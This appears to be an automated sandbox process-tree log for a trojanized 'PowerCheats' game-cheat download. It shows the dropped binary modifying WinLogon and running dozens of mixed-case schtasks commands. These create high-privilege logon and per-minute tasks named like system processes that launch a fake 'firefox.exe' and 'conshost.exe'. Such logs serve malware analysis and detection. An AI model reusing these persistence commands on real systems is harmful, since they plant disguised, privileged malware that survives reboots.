C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.8.909606965\1573623847" -childID 7 -isForBrowser -prefsHandle 5912 -prefMapHandle 6060 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70548bf3-7724-4931-9acb-c625bb9ba1a8} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6052 1cf72b67858 tab3⤵PID:3936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.9.1697217496\530272217" -childID 8 -isForBrowser -prefsHandle 6316 -prefMapHandle 6032 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42b9701e-7c0e-4d92-88d3-f863588d49ad} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6328 1cf72b6ab58 tab3⤵PID:3428
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.10.1843568857\55871434" -childID 9 -isForBrowser -prefsHandle 6292 -prefMapHandle 6296 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec759ff7-94a7-48d9-8ab8-c1f3ec56ccf4} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6284 1cf75fe1b58 tab3⤵PID:3252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.11.817626368\1742098708" -childID 10 -isForBrowser -prefsHandle 5532 -prefMapHandle 5940 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fab57c44-e0d6-4b0e-ac32-320aefe8e7ba} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 6252 1cf72b67858 tab3⤵PID:5392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.12.1307065215\1150680337" -childID 11 -isForBrowser -prefsHandle 5316 -prefMapHandle 5616 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4cb125d-665a-486b-a7bd-c4873deabe65} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 10476 1cf72b6a558 tab3⤵PID:5400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.13.565609098\1172162159" -childID 12 -isForBrowser -prefsHandle 10472 -prefMapHandle 4344 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06e8c702-abd3-4ded-85eb-825b286541bb} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5452 1cf75ef0d58 tab3⤵PID:5408
-
-
C:\Users\Admin\Downloads\PowerCheats.exe"C:\Users\Admin\Downloads\PowerCheats.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5264 -
C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe"C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4456 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" & exit6⤵PID:6104
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "conhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe"7⤵
- Creates scheduled task(s)
PID:4660
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5340
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST & exit6⤵PID:1452
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "dllhost" /tr "C:\Windows\conshost.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4604
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3892
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5128
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1384
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5940
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4604
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:2320
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5852
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:1416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4528
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5832
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5952
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2784
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:1304
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5908
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5312
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5832
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5476
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2208
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1980
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5988
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4000
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5208
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5276
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:6084
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3996
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:944
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3516
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4248
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1332
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5832
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5952
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3044
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:4256
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1304
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5980
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1332
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1268
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4244
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4136
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3448
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5468
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3728
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5128
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4580
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:1072
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5352
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:6084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1040
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:6080
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5276
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4256
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5844
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5932
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:2480
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:380
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4840
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:1476
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3648
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1976
-
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5196
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:2844
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1480
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:32
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5164
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:2552
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5368
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1944
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1184
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1648
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:6088
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5636
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:2520
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4404
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1120
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3188
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5840
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:1716
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:3516
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:3232
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4308
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:4732
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:1984
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:2300
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:4280
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:6068
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:32
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵
- Creates scheduled task(s)
PID:5240
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit6⤵PID:5804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST7⤵PID:5480
-
-
-
